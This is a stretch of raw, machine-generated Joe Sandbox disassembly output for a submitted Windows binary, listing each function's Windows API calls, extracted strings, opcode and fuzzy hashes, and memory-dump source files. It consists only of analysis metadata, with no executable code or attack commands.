                                                                        • Instruction ID: 4a5571553f9bcc0c216258ea057607519bea1ef3badaa7a3ff3f1420966dd079
                                                                        • Opcode Fuzzy Hash: 4acd2cd71df3751219b85893f29bd274d274088e509a9e7e7bdcfbb52339aa5e
                                                                        • Instruction Fuzzy Hash: 55410B7684511CAFCF61EB94CC85DDBB3BCEF44310F4051A6B659B2051EA34ABE98F50
                                                                        APIs
                                                                        • CharLowerBuffW.USER32(00F0DC00,00F0DC00,00F0DC00), ref: 00EBD7CE
                                                                        • GetDriveTypeW.KERNEL32(?,00F23A70,00000061), ref: 00EBD898
                                                                        • _wcscpy.LIBCMT ref: 00EBD8C2
                                                                        Strings
                                                                        Memory Dump Source
                                                                        • Source File: 00000000.00000002.1673381954.0000000000E71000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E70000, based on PE: true
                                                                        • Associated: 00000000.00000002.1673361876.0000000000E70000.00000002.00000001.01000000.00000003.sdmp
                                                                        • Associated: 00000000.00000002.1673440583.0000000000EFD000.00000002.00000001.01000000.00000003.sdmp
                                                                        • Associated: 00000000.00000002.1673440583.0000000000F1E000.00000002.00000001.01000000.00000003.sdmp
                                                                        • Associated: 00000000.00000002.1673474923.0000000000F2A000.00000004.00000001.01000000.00000003.sdmp
                                                                        • Associated: 00000000.00000002.1673488794.0000000000F34000.00000002.00000001.01000000.00000003.sdmp
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_0_2_e70000_KSts9xW7qy.jbxd
                                                                        Similarity
                                                                        • API ID: BuffCharDriveLowerType_wcscpy
                                                                        • String ID: all$cdrom$fixed$network$ramdisk$removable$unknown
                                                                        • API String ID: 2820617543-1000479233
                                                                        • Opcode ID: babec0e6f73be90b8c5444741a4a897162cc1dab29a5f8d618c09bcbbe20411f
                                                                        • Instruction ID: 0b70c3a12bbe637ac185878dff83a26f55d49027f2454d1b5561cb50d271dda2
                                                                        • Opcode Fuzzy Hash: babec0e6f73be90b8c5444741a4a897162cc1dab29a5f8d618c09bcbbe20411f
                                                                        • Instruction Fuzzy Hash: 1F517E35508240AFC714EF14DC82AABB7E5EF84318F20A82DF59D672A2EB71DD05DB42
                                                                        APIs
                                                                        • __swprintf.LIBCMT ref: 00E793AB
                                                                        • __itow.LIBCMT ref: 00E793DF
                                                                          • Part of subcall function 00E91557: _xtow@16.LIBCMT ref: 00E91578
                                                                        Strings
                                                                        Memory Dump Source
                                                                        • Source File: 00000000.00000002.1673381954.0000000000E71000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E70000, based on PE: true
                                                                        • Associated: 00000000.00000002.1673361876.0000000000E70000.00000002.00000001.01000000.00000003.sdmp
                                                                        • Associated: 00000000.00000002.1673440583.0000000000EFD000.00000002.00000001.01000000.00000003.sdmp
                                                                        • Associated: 00000000.00000002.1673440583.0000000000F1E000.00000002.00000001.01000000.00000003.sdmp
                                                                        • Associated: 00000000.00000002.1673474923.0000000000F2A000.00000004.00000001.01000000.00000003.sdmp
                                                                        • Associated: 00000000.00000002.1673488794.0000000000F34000.00000002.00000001.01000000.00000003.sdmp
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_0_2_e70000_KSts9xW7qy.jbxd
                                                                        Similarity
                                                                        • API ID: __itow__swprintf_xtow@16
                                                                        • String ID: %.15g$0x%p$False$True
                                                                        • API String ID: 1502193981-2263619337
                                                                        • Opcode ID: d8fef573d2fefc2d19472527bb4e1f142e8feb2defa3ccb65e77041318ab27b5
                                                                        • Instruction ID: f7cb3f2da96976220cf59bb1d051fb41710e38dc8277b8e438ccc008fdb79003
                                                                        • Opcode Fuzzy Hash: d8fef573d2fefc2d19472527bb4e1f142e8feb2defa3ccb65e77041318ab27b5
                                                                        • Instruction Fuzzy Hash: 0B41D471504209ABEB24EB74D942EAAB3E8EF48304F3094AEE14DF71C2EA71D941DB51
                                                                        APIs
                                                                        • MoveWindow.USER32(?,?,?,000000FF,000000FF,00000000,?,?,000000FF,000000FF,?,?,static,00000000,00000000,?), ref: 00EDA259
                                                                        • CreateCompatibleDC.GDI32(00000000), ref: 00EDA260
                                                                        • SendMessageW.USER32(?,00000173,00000000,00000000), ref: 00EDA273
                                                                        • SelectObject.GDI32(00000000,00000000), ref: 00EDA27B
                                                                        • GetPixel.GDI32(00000000,00000000,00000000), ref: 00EDA286
                                                                        • DeleteDC.GDI32(00000000), ref: 00EDA28F
                                                                        • GetWindowLongW.USER32(?,000000EC), ref: 00EDA299
                                                                        • SetLayeredWindowAttributes.USER32(?,00000000,00000000,00000001), ref: 00EDA2AD
                                                                        • DestroyWindow.USER32(?,?,?,000000FF,000000FF,?,?,static,00000000,00000000,?,?,00000000,00000000,?,?), ref: 00EDA2B9
                                                                        Strings
                                                                        Memory Dump Source
                                                                        • Source File: 00000000.00000002.1673381954.0000000000E71000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E70000, based on PE: true
                                                                        • Associated: 00000000.00000002.1673361876.0000000000E70000.00000002.00000001.01000000.00000003.sdmp
                                                                        • Associated: 00000000.00000002.1673440583.0000000000EFD000.00000002.00000001.01000000.00000003.sdmp
                                                                        • Associated: 00000000.00000002.1673440583.0000000000F1E000.00000002.00000001.01000000.00000003.sdmp
                                                                        • Associated: 00000000.00000002.1673474923.0000000000F2A000.00000004.00000001.01000000.00000003.sdmp
                                                                        • Associated: 00000000.00000002.1673488794.0000000000F34000.00000002.00000001.01000000.00000003.sdmp
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_0_2_e70000_KSts9xW7qy.jbxd
                                                                        Similarity
                                                                        • API ID: Window$AttributesCompatibleCreateDeleteDestroyLayeredLongMessageMoveObjectPixelSelectSend
                                                                        • String ID: static
                                                                        • API String ID: 2559357485-2160076837
                                                                        • Opcode ID: 449deb7ceebd4021a058f8ca2209e6035c45bbc2845b56fd718a2162b16a9aff
                                                                        • Instruction ID: 1a8e2b95aae35bb4328e809f54dca18a423200fa81a165d9c4f60deb3461980b
                                                                        • Opcode Fuzzy Hash: 449deb7ceebd4021a058f8ca2209e6035c45bbc2845b56fd718a2162b16a9aff
                                                                        • Instruction Fuzzy Hash: F431AC31101114AFDF115FA5DC49FEA3F6AFF49324F150225FA19B62A0C732D822DBA5
                                                                        Memory Dump Source
                                                                        • Source File: 00000000.00000002.1673381954.0000000000E71000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E70000, based on PE: true
                                                                         • Associated: 00000000.00000002.1673361876.0000000000E70000.00000002.00000001.01000000.00000003.sdmp
                                                                         • Associated: 00000000.00000002.1673440583.0000000000EFD000.00000002.00000001.01000000.00000003.sdmp
                                                                         • Associated: 00000000.00000002.1673440583.0000000000F1E000.00000002.00000001.01000000.00000003.sdmp
                                                                         • Associated: 00000000.00000002.1673474923.0000000000F2A000.00000004.00000001.01000000.00000003.sdmp
                                                                         • Associated: 00000000.00000002.1673488794.0000000000F34000.00000002.00000001.01000000.00000003.sdmp
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_0_2_e70000_KSts9xW7qy.jbxd
                                                                        Similarity
                                                                        • API ID: _wcscpy$CleanupStartup_strcatgethostbynamegethostnameinet_ntoa
                                                                        • String ID: 0.0.0.0
                                                                        • API String ID: 2620052-3771769585
                                                                        • Opcode ID: 03be5e5b76c56b58736fb6ec2d6de32e7107f762af88cd91fdad11e6c0ff45ef
                                                                        • Instruction ID: 05857999e1c05ba7c50ad61af7aaa1bcb8685ef0e883d319252717fef1c1c98e
                                                                        • Opcode Fuzzy Hash: 03be5e5b76c56b58736fb6ec2d6de32e7107f762af88cd91fdad11e6c0ff45ef
                                                                        • Instruction Fuzzy Hash: 9811E472608114AFCB24BB65AC0AEFA7BACEF80714F011066F149B6081EF74DA85DB91
                                                                        APIs
                                                                        • _memset.LIBCMT ref: 00E95047
                                                                          • Part of subcall function 00E97C0E: __getptd_noexit.LIBCMT ref: 00E97C0E
                                                                        • __gmtime64_s.LIBCMT ref: 00E950E0
                                                                        • __gmtime64_s.LIBCMT ref: 00E95116
                                                                        • __gmtime64_s.LIBCMT ref: 00E95133
                                                                        • __allrem.LIBCMT ref: 00E95189
                                                                        • __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 00E951A5
                                                                        • __allrem.LIBCMT ref: 00E951BC
                                                                        • __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 00E951DA
                                                                        • __allrem.LIBCMT ref: 00E951F1
                                                                        • __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 00E9520F
                                                                        • __invoke_watson.LIBCMT ref: 00E95280
                                                                        Memory Dump Source
                                                                        • Source File: 00000000.00000002.1673381954.0000000000E71000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E70000, based on PE: true
                                                                         • Associated: 00000000.00000002.1673361876.0000000000E70000.00000002.00000001.01000000.00000003.sdmp
                                                                         • Associated: 00000000.00000002.1673440583.0000000000EFD000.00000002.00000001.01000000.00000003.sdmp
                                                                         • Associated: 00000000.00000002.1673440583.0000000000F1E000.00000002.00000001.01000000.00000003.sdmp
                                                                         • Associated: 00000000.00000002.1673474923.0000000000F2A000.00000004.00000001.01000000.00000003.sdmp
                                                                         • Associated: 00000000.00000002.1673488794.0000000000F34000.00000002.00000001.01000000.00000003.sdmp
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_0_2_e70000_KSts9xW7qy.jbxd
                                                                        Similarity
                                                                        • API ID: Unothrow_t@std@@@__allrem__ehfuncinfo$??2@__gmtime64_s$__getptd_noexit__invoke_watson_memset
                                                                        • String ID:
                                                                        • API String ID: 384356119-0
                                                                        • Opcode ID: d5e017027a87c5018ad803d53256558374d4b82fb585307daa6d96de3ac92c4c
                                                                        • Instruction ID: 03bbcfcce8ad2fb17be52cda0297e51af2a8a042e4922b402989c9f3f55508ee
                                                                        • Opcode Fuzzy Hash: d5e017027a87c5018ad803d53256558374d4b82fb585307daa6d96de3ac92c4c
                                                                        • Instruction Fuzzy Hash: 8F71D773A01F16ABDF159F68CC41B5AB3F8AF45764F14522AF910FA681E770E94087D0
                                                                        APIs
                                                                        • _memset.LIBCMT ref: 00EB4DF8
                                                                        • GetMenuItemInfoW.USER32(00F31708,000000FF,00000000,00000030), ref: 00EB4E59
                                                                        • SetMenuItemInfoW.USER32(00F31708,00000004,00000000,00000030), ref: 00EB4E8F
                                                                        • Sleep.KERNEL32(000001F4), ref: 00EB4EA1
                                                                        • GetMenuItemCount.USER32(?), ref: 00EB4EE5
                                                                        • GetMenuItemID.USER32(?,00000000), ref: 00EB4F01
                                                                        • GetMenuItemID.USER32(?,-00000001), ref: 00EB4F2B
                                                                        • GetMenuItemID.USER32(?,?), ref: 00EB4F70
                                                                        • CheckMenuRadioItem.USER32(?,00000000,?,00000000,00000400), ref: 00EB4FB6
                                                                        • GetMenuItemInfoW.USER32(?,000000FF,00000000,00000030), ref: 00EB4FCA
                                                                        • SetMenuItemInfoW.USER32(?,000000FF,00000000,00000030), ref: 00EB4FEB
                                                                        Memory Dump Source
                                                                        • Source File: 00000000.00000002.1673381954.0000000000E71000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E70000, based on PE: true
                                                                         • Associated: 00000000.00000002.1673361876.0000000000E70000.00000002.00000001.01000000.00000003.sdmp
                                                                         • Associated: 00000000.00000002.1673440583.0000000000EFD000.00000002.00000001.01000000.00000003.sdmp
                                                                         • Associated: 00000000.00000002.1673440583.0000000000F1E000.00000002.00000001.01000000.00000003.sdmp
                                                                         • Associated: 00000000.00000002.1673474923.0000000000F2A000.00000004.00000001.01000000.00000003.sdmp
                                                                         • Associated: 00000000.00000002.1673488794.0000000000F34000.00000002.00000001.01000000.00000003.sdmp
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_0_2_e70000_KSts9xW7qy.jbxd
                                                                        Similarity
                                                                        • API ID: ItemMenu$Info$CheckCountRadioSleep_memset
                                                                        • String ID:
                                                                        • API String ID: 4176008265-0
                                                                        • Opcode ID: eae01992e35d65abe85ca877e782a71273c6ea5c7bf3989e5c48d6147e839a45
                                                                        • Instruction ID: d0d434bf017babd3b157f1336dbc4491b2e94c52f0ffc1bab2d94b0d23df9ff6
                                                                        • Opcode Fuzzy Hash: eae01992e35d65abe85ca877e782a71273c6ea5c7bf3989e5c48d6147e839a45
                                                                        • Instruction Fuzzy Hash: 636159B1A04249AFDB21CFA4DC88AFF7BBABB45308F142059F441B7292D731AD45DB20
                                                                        APIs
                                                                        • SendMessageW.USER32(?,0000101F,00000000,00000000), ref: 00ED9C98
                                                                        • SendMessageW.USER32(00000000,?,0000101F,00000000), ref: 00ED9C9B
                                                                        • GetWindowLongW.USER32(?,000000F0), ref: 00ED9CBF
                                                                        • _memset.LIBCMT ref: 00ED9CD0
                                                                        • SendMessageW.USER32(?,00001004,00000000,00000000), ref: 00ED9CE2
                                                                        • SendMessageW.USER32(?,0000104D,00000000,00000007), ref: 00ED9D5A
                                                                        Memory Dump Source
                                                                        • Source File: 00000000.00000002.1673381954.0000000000E71000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E70000, based on PE: true
                                                                         • Associated: 00000000.00000002.1673361876.0000000000E70000.00000002.00000001.01000000.00000003.sdmp
                                                                         • Associated: 00000000.00000002.1673440583.0000000000EFD000.00000002.00000001.01000000.00000003.sdmp
                                                                         • Associated: 00000000.00000002.1673440583.0000000000F1E000.00000002.00000001.01000000.00000003.sdmp
                                                                         • Associated: 00000000.00000002.1673474923.0000000000F2A000.00000004.00000001.01000000.00000003.sdmp
                                                                         • Associated: 00000000.00000002.1673488794.0000000000F34000.00000002.00000001.01000000.00000003.sdmp
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_0_2_e70000_KSts9xW7qy.jbxd
                                                                        Similarity
                                                                        • API ID: MessageSend$LongWindow_memset
                                                                        • String ID:
                                                                        • API String ID: 830647256-0
                                                                        • Opcode ID: 015de3f7f9dc43c5f97561f15320a01e2bb75f2f29957719d80f47292f6b453a
                                                                        • Instruction ID: a0772e53db42f0505c0fc597e387bcd466cbe66253f927d80447aa1ffd485b6d
                                                                        • Opcode Fuzzy Hash: 015de3f7f9dc43c5f97561f15320a01e2bb75f2f29957719d80f47292f6b453a
                                                                        • Instruction Fuzzy Hash: 55616975A00248AFDB11DFA8CC81EEEB7B9EF09714F14415AFA05E73A2D770A942DB50
                                                                        APIs
                                                                        • SafeArrayAllocDescriptorEx.OLEAUT32(0000000C,00000000,?), ref: 00EA94FE
                                                                        • SafeArrayAllocData.OLEAUT32(?), ref: 00EA9549
                                                                        • VariantInit.OLEAUT32(?), ref: 00EA955B
                                                                        • SafeArrayAccessData.OLEAUT32(?,?), ref: 00EA957B
                                                                        • VariantCopy.OLEAUT32(?,?), ref: 00EA95BE
                                                                        • SafeArrayUnaccessData.OLEAUT32(?), ref: 00EA95D2
                                                                        • VariantClear.OLEAUT32(?), ref: 00EA95E7
                                                                        • SafeArrayDestroyData.OLEAUT32(?), ref: 00EA95F4
                                                                        • SafeArrayDestroyDescriptor.OLEAUT32(?), ref: 00EA95FD
                                                                        • VariantClear.OLEAUT32(?), ref: 00EA960F
                                                                        • SafeArrayDestroyDescriptor.OLEAUT32(?), ref: 00EA961A
                                                                        Memory Dump Source
                                                                        • Source File: 00000000.00000002.1673381954.0000000000E71000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E70000, based on PE: true
                                                                         • Associated: 00000000.00000002.1673361876.0000000000E70000.00000002.00000001.01000000.00000003.sdmp
                                                                         • Associated: 00000000.00000002.1673440583.0000000000EFD000.00000002.00000001.01000000.00000003.sdmp
                                                                         • Associated: 00000000.00000002.1673440583.0000000000F1E000.00000002.00000001.01000000.00000003.sdmp
                                                                         • Associated: 00000000.00000002.1673474923.0000000000F2A000.00000004.00000001.01000000.00000003.sdmp
                                                                         • Associated: 00000000.00000002.1673488794.0000000000F34000.00000002.00000001.01000000.00000003.sdmp
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_0_2_e70000_KSts9xW7qy.jbxd
                                                                        Similarity
                                                                        • API ID: ArraySafe$DataVariant$DescriptorDestroy$AllocClear$AccessCopyInitUnaccess
                                                                        • String ID:
                                                                        • API String ID: 2706829360-0
                                                                        • Opcode ID: 63082eb88b6e39a440b214b4d7df9171f5a4c886bd9fd5ae1ebf13bdb7ee01a5
                                                                        • Instruction ID: 666c69ddd0d221cabf2ead82c1be8a869040a2b1b98d9f81fda53629036c84d3
                                                                        • Opcode Fuzzy Hash: 63082eb88b6e39a440b214b4d7df9171f5a4c886bd9fd5ae1ebf13bdb7ee01a5
                                                                        • Instruction Fuzzy Hash: BB413D31D00219AFCB02EFA5DC849EEBFBAFF89354F108065E515B7251DB30AA45CBA0
                                                                        APIs
                                                                          • Part of subcall function 00E7936C: __swprintf.LIBCMT ref: 00E793AB
                                                                          • Part of subcall function 00E7936C: __itow.LIBCMT ref: 00E793DF
                                                                        • CoInitialize.OLE32 ref: 00ECADF6
                                                                        • CoUninitialize.OLE32 ref: 00ECAE01
                                                                        • CoCreateInstance.OLE32(?,00000000,00000017,00EFD8FC,?), ref: 00ECAE61
                                                                        • IIDFromString.OLE32(?,?), ref: 00ECAED4
                                                                        • VariantInit.OLEAUT32(?), ref: 00ECAF6E
                                                                        • VariantClear.OLEAUT32(?), ref: 00ECAFCF
                                                                        Memory Dump Source
                                                                        • Source File: 00000000.00000002.1673381954.0000000000E71000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E70000, based on PE: true
                                                                         • Associated: 00000000.00000002.1673361876.0000000000E70000.00000002.00000001.01000000.00000003.sdmp
                                                                         • Associated: 00000000.00000002.1673440583.0000000000EFD000.00000002.00000001.01000000.00000003.sdmp
                                                                         • Associated: 00000000.00000002.1673440583.0000000000F1E000.00000002.00000001.01000000.00000003.sdmp
                                                                         • Associated: 00000000.00000002.1673474923.0000000000F2A000.00000004.00000001.01000000.00000003.sdmp
                                                                         • Associated: 00000000.00000002.1673488794.0000000000F34000.00000002.00000001.01000000.00000003.sdmp
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_0_2_e70000_KSts9xW7qy.jbxd
                                                                        Similarity
                                                                        • API ID: Variant$ClearCreateFromInitInitializeInstanceStringUninitialize__itow__swprintf
                                                                        • String ID: Failed to create object$Invalid parameter$NULL Pointer assignment
                                                                        • API String ID: 834269672-1287834457
                                                                        • Opcode ID: 0b711684c9fd49716730e6648af29e8aa2400f3460f110c6028bc5e91922ea21
                                                                        • Instruction ID: 42b3aa57d3009c803e1f0be7a8acfcb7ab434795fdbae9379b52cf524fba732c
                                                                        • Opcode Fuzzy Hash: 0b711684c9fd49716730e6648af29e8aa2400f3460f110c6028bc5e91922ea21
                                                                        • Instruction Fuzzy Hash: 7B618C702083159FC710DF54D944FAABBE8AF88718F08542DF985AB291C771ED89CB93
                                                                        APIs
                                                                        • WSAStartup.WSOCK32(00000101,?), ref: 00EC8168
                                                                        • inet_addr.WSOCK32(?,?,?), ref: 00EC81AD
                                                                        • gethostbyname.WSOCK32(?), ref: 00EC81B9
                                                                        • IcmpCreateFile.IPHLPAPI ref: 00EC81C7
                                                                        • IcmpSendEcho.IPHLPAPI(?,?,?,00000005,00000000,?,00000029,00000FA0), ref: 00EC8237
                                                                        • IcmpSendEcho.IPHLPAPI(00000000,00000000,?,00000005,00000000,?,00000029,00000FA0), ref: 00EC824D
                                                                        • IcmpCloseHandle.IPHLPAPI(00000000), ref: 00EC82C2
                                                                        • WSACleanup.WSOCK32 ref: 00EC82C8
                                                                        Memory Dump Source
                                                                        • Source File: 00000000.00000002.1673381954.0000000000E71000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E70000, based on PE: true
                                                                         • Associated: 00000000.00000002.1673361876.0000000000E70000.00000002.00000001.01000000.00000003.sdmp
                                                                         • Associated: 00000000.00000002.1673440583.0000000000EFD000.00000002.00000001.01000000.00000003.sdmp
                                                                         • Associated: 00000000.00000002.1673440583.0000000000F1E000.00000002.00000001.01000000.00000003.sdmp
                                                                         • Associated: 00000000.00000002.1673474923.0000000000F2A000.00000004.00000001.01000000.00000003.sdmp
                                                                         • Associated: 00000000.00000002.1673488794.0000000000F34000.00000002.00000001.01000000.00000003.sdmp
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_0_2_e70000_KSts9xW7qy.jbxd
                                                                        Similarity
                                                                        • API ID: Icmp$EchoSend$CleanupCloseCreateFileHandleStartupgethostbynameinet_addr
                                                                        • String ID: Ping
                                                                        • API String ID: 1028309954-2246546115
                                                                        • Opcode ID: 910bb80bdacf4478d3f6744282558966002611e472de442f84a35f660405fb96
                                                                        • Instruction ID: 0f7b0d8bb2b8cc5f6a15138e2844804de9280ea177a2cbe52d952c518e47116b
                                                                        • Opcode Fuzzy Hash: 910bb80bdacf4478d3f6744282558966002611e472de442f84a35f660405fb96
                                                                        • Instruction Fuzzy Hash: 0C5190316047009FD724AF64CF49F6ABBE5AF44314F04995EF999BB2A1DB31E806CB41
                                                                        APIs
                                                                        • SetErrorMode.KERNEL32(00000001), ref: 00EBE396
                                                                        • GetDiskFreeSpaceW.KERNEL32(?,?,?,?,?,00000002,00000001), ref: 00EBE40C
                                                                        • GetLastError.KERNEL32 ref: 00EBE416
                                                                        • SetErrorMode.KERNEL32(00000000,READY), ref: 00EBE483
                                                                        Memory Dump Source
                                                                        • Source File: 00000000.00000002.1673381954.0000000000E71000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E70000, based on PE: true
                                                                         • Associated: 00000000.00000002.1673361876.0000000000E70000.00000002.00000001.01000000.00000003.sdmp
                                                                         • Associated: 00000000.00000002.1673440583.0000000000EFD000.00000002.00000001.01000000.00000003.sdmp
                                                                         • Associated: 00000000.00000002.1673440583.0000000000F1E000.00000002.00000001.01000000.00000003.sdmp
                                                                         • Associated: 00000000.00000002.1673474923.0000000000F2A000.00000004.00000001.01000000.00000003.sdmp
                                                                         • Associated: 00000000.00000002.1673488794.0000000000F34000.00000002.00000001.01000000.00000003.sdmp
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_0_2_e70000_KSts9xW7qy.jbxd
                                                                        Similarity
                                                                        • API ID: Error$Mode$DiskFreeLastSpace
                                                                        • String ID: INVALID$NOTREADY$READONLY$READY$UNKNOWN
                                                                        • API String ID: 4194297153-14809454
                                                                        • Opcode ID: c00ee504da6033bbeecbad03042bfbb726dade4eb512d880e8a0eda13509b716
                                                                        • Instruction ID: 598189e5615ade92951fcba40ee50808bcd984508688a78b96a04f0a00e0d366
                                                                        • Opcode Fuzzy Hash: c00ee504da6033bbeecbad03042bfbb726dade4eb512d880e8a0eda13509b716
                                                                        • Instruction Fuzzy Hash: C5318035A002099FDB01EFA4D845AFEBBF5EF44304F149055E515BB391DA74DA01CB91
                                                                        APIs
                                                                        • SendMessageW.USER32(?,0000018C,000000FF,00000002), ref: 00EAB98C
                                                                        • GetDlgCtrlID.USER32 ref: 00EAB997
                                                                        • GetParent.USER32 ref: 00EAB9B3
                                                                        • SendMessageW.USER32(00000000,?,00000111,?), ref: 00EAB9B6
                                                                        • GetDlgCtrlID.USER32(?), ref: 00EAB9BF
                                                                        • GetParent.USER32(?), ref: 00EAB9DB
                                                                        • SendMessageW.USER32(00000000,?,?,00000111), ref: 00EAB9DE
                                                                        Memory Dump Source
                                                                        • Source File: 00000000.00000002.1673381954.0000000000E71000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E70000, based on PE: true
                                                                         • Associated: 00000000.00000002.1673361876.0000000000E70000.00000002.00000001.01000000.00000003.sdmp
                                                                         • Associated: 00000000.00000002.1673440583.0000000000EFD000.00000002.00000001.01000000.00000003.sdmp
                                                                         • Associated: 00000000.00000002.1673440583.0000000000F1E000.00000002.00000001.01000000.00000003.sdmp
                                                                         • Associated: 00000000.00000002.1673474923.0000000000F2A000.00000004.00000001.01000000.00000003.sdmp
                                                                         • Associated: 00000000.00000002.1673488794.0000000000F34000.00000002.00000001.01000000.00000003.sdmp
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_0_2_e70000_KSts9xW7qy.jbxd
                                                                        Similarity
                                                                        • API ID: MessageSend$CtrlParent
                                                                        • String ID: ComboBox$ListBox
                                                                        • API String ID: 1383977212-1403004172
                                                                        • Opcode ID: 98a5f708dd901cbd27dea15447a9817bfe92117cadc993502205a8b06e1c3022
                                                                        • Instruction ID: d7e887be7999251e0d763ec577d9f42444de093c5ea6b17e5ba8f1bec4277a6d
                                                                        • Opcode Fuzzy Hash: 98a5f708dd901cbd27dea15447a9817bfe92117cadc993502205a8b06e1c3022
                                                                        • Instruction Fuzzy Hash: EF21A4B4900104BFDB04ABA5CC85EFEBBB9EB8A310B104119F555FB292DB745819DB21
                                                                        APIs
                                                                        • SendMessageW.USER32(?,00000186,00000002,00000000), ref: 00EABA73
                                                                        • GetDlgCtrlID.USER32 ref: 00EABA7E
                                                                        • GetParent.USER32 ref: 00EABA9A
                                                                        • SendMessageW.USER32(00000000,?,00000111,?), ref: 00EABA9D
                                                                        • GetDlgCtrlID.USER32(?), ref: 00EABAA6
                                                                        • GetParent.USER32(?), ref: 00EABAC2
                                                                        • SendMessageW.USER32(00000000,?,?,00000111), ref: 00EABAC5
                                                                        Strings
                                                                        Memory Dump Source
                                                                        • Source File: 00000000.00000002.1673381954.0000000000E71000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E70000, based on PE: true
                                                                        • Associated: 00000000.00000002.1673361876.0000000000E70000.00000002.00000001.01000000.00000003.sdmp
                                                                        • Associated: 00000000.00000002.1673440583.0000000000EFD000.00000002.00000001.01000000.00000003.sdmp
                                                                        • Associated: 00000000.00000002.1673440583.0000000000F1E000.00000002.00000001.01000000.00000003.sdmp
                                                                        • Associated: 00000000.00000002.1673474923.0000000000F2A000.00000004.00000001.01000000.00000003.sdmp
                                                                        • Associated: 00000000.00000002.1673488794.0000000000F34000.00000002.00000001.01000000.00000003.sdmp
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_0_2_e70000_KSts9xW7qy.jbxd
                                                                        Similarity
                                                                        • API ID: MessageSend$CtrlParent
                                                                        • String ID: ComboBox$ListBox
                                                                        • API String ID: 1383977212-1403004172
                                                                        • Opcode ID: 124c9dfc8d491a7441c5dd97c9b118b35e1f42ec36f405d7431d9ec77b57a599
                                                                        • Instruction ID: 189f5b3a65820d42bbd81b9522ec1e0beb14a5d46dbb3d91a8bc06f91798e652
                                                                        • Opcode Fuzzy Hash: 124c9dfc8d491a7441c5dd97c9b118b35e1f42ec36f405d7431d9ec77b57a599
                                                                        • Instruction Fuzzy Hash: 6D2195B4940104BFDB01ABA4CC85EFEBBB9EF4A304F105019F555FB192DB759919EB20
                                                                        APIs
                                                                        • GetParent.USER32 ref: 00EABAE3
                                                                        • GetClassNameW.USER32(00000000,?,00000100), ref: 00EABAF8
                                                                        • _wcscmp.LIBCMT ref: 00EABB0A
                                                                        • SendMessageW.USER32(00000000,00000111,0000702B,00000000), ref: 00EABB85
                                                                        Strings
                                                                        Memory Dump Source
                                                                        • Source File: 00000000.00000002.1673381954.0000000000E71000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E70000, based on PE: true
                                                                        • Associated: 00000000.00000002.1673361876.0000000000E70000.00000002.00000001.01000000.00000003.sdmp
                                                                        • Associated: 00000000.00000002.1673440583.0000000000EFD000.00000002.00000001.01000000.00000003.sdmp
                                                                        • Associated: 00000000.00000002.1673440583.0000000000F1E000.00000002.00000001.01000000.00000003.sdmp
                                                                        • Associated: 00000000.00000002.1673474923.0000000000F2A000.00000004.00000001.01000000.00000003.sdmp
                                                                        • Associated: 00000000.00000002.1673488794.0000000000F34000.00000002.00000001.01000000.00000003.sdmp
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_0_2_e70000_KSts9xW7qy.jbxd
                                                                        Similarity
                                                                        • API ID: ClassMessageNameParentSend_wcscmp
                                                                        • String ID: SHELLDLL_DefView$details$largeicons$list$smallicons
                                                                        • API String ID: 1704125052-3381328864
                                                                        • Opcode ID: 972be91f7a0fd31e4b107f4a26af1665119490cc76743cf22e8b864f8fe16ee7
                                                                        • Instruction ID: abd7bc036d849dc562d7245c3b25cb665456c83fa43d5a13211413a86407a6f6
                                                                        • Opcode Fuzzy Hash: 972be91f7a0fd31e4b107f4a26af1665119490cc76743cf22e8b864f8fe16ee7
                                                                        • Instruction Fuzzy Hash: CF11067660C303FDFA206624EC07DA6379DDB2A324B201022F904F80D6FFA5B9919924
                                                                        APIs
                                                                        • VariantInit.OLEAUT32(?), ref: 00ECB2D5
                                                                        • CoInitialize.OLE32(00000000), ref: 00ECB302
                                                                        • CoUninitialize.OLE32 ref: 00ECB30C
                                                                        • GetRunningObjectTable.OLE32(00000000,?), ref: 00ECB40C
                                                                        • SetErrorMode.KERNEL32(00000001,00000029), ref: 00ECB539
                                                                        • CoGetInstanceFromFile.OLE32(00000000,?,00000000,00000015,00000002), ref: 00ECB56D
                                                                        • CoGetObject.OLE32(?,00000000,00EFD91C,?), ref: 00ECB590
                                                                        • SetErrorMode.KERNEL32(00000000), ref: 00ECB5A3
                                                                        • SetErrorMode.KERNEL32(00000000,00000000,00000000,00000000,00000000), ref: 00ECB623
                                                                        • VariantClear.OLEAUT32(00EFD91C), ref: 00ECB633
                                                                        Memory Dump Source
                                                                        • Source File: 00000000.00000002.1673381954.0000000000E71000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E70000, based on PE: true
